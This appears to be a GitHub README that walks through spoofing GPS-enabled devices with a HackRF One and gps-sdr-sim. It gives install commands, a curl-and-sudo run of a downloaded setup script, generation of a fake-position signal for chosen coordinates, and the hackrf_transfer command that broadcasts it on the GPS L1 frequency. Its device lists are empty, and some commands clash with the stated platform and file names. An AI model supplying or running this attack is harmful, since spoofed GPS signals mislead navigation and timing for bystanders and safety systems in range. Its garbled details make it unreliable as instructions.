|then 5e6bf76016||2 weeks ago|
|README.md||2 weeks ago|
How to fool your GPS enabled devices using Software Defined Radio, in this case using the HackRF One. This guide is written for Arch linux. But should be relatively consistent with other platforms.
$ sudo apt-update $ sudo apt install gnuradio libhackrf0 hackrf libhackrf-dev
Hook up your HackRF and see if its recognized:
You should see something like:
Found HackRF board. Board ID Number: 2 (HackRF One) Firmware Version: 2015.07.2 Part ID Number: 0xa000cw898 0x09898908 (redacted) Serial Number: 000000000 0000 00 00000000 (redacted
$ git clone https://github.com/osqzss/gps-sdr-sim.git $ cd gps-sdr-sim $ make
Making gps sim only takes a few seconds.
you could build gps-sdr-sim from scratch, but I choose to use the binary provided by the ‘blackarch’ distro’s repository.
$ curl -O https://blackarch.org/strap.sh $ chmod +x strap.sh $ sudo ./strap.sh (installing the keyring step takes a few minutes) $ sudo pacman -Syyu (update pacman sources etc. although stap.sh already seems to take care of this) $ sudo pacman -S blackarch-radio (just install all the radio stuff (1Gb)) $ sudo modprobe hackrf (load the hackrf kernel module/driver) $ hackrf_info (see if you can see your hack rf one)
Download the latest brdc file from here: ftp://cddis.gsfc.nasa.gov/gnss/data/daily (for example: ftp://cddis.gsfc.nasa.gov/gnss/data/daily/2020/brdc/brdc1460.20g.Z)
Extract the compressed file in a place you will remember
Generate binary file to be transmitted by hackrf:
$ ./gps-sdr-sim -b 8 -e ~/LOCATION_OF_YOUR_BRDC/brdc1460.20n -l 45.803304,12.133697,100
The default option generates a 300sec (5 min) ‘motion’ file. This can be increased by using using the ‘-d’ option. The last part is the location of your choosing (lat, long, altitude). This will run for 300 seconds and generate a ‘gpssim.bin’ file. NOTE the lat/long/alt should not contain any spaces, only commas.
To transmit your spoofed gps position using the hackrf use the follwing command:
$ hackrf_transfer -t ~/LOCATION_OF_YOUR_BIN_FILE/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0
The motion file only simulates for a given period (-d), luckily hackrf_transfer can repeat the transmission with the ‘-R’ switch! (see: https://www.blackhat.com/docs/eu-15/materials/eu-15-Kang-Is-Your-Timespace-Safe-Time-And-Position-Spoofing-Opensourcely-wp.pdf)
Vulnurable devices tested (no need to switch of wifi, gsm etc, works out of the box):
Not Vulnurable (also not with wifi disabled):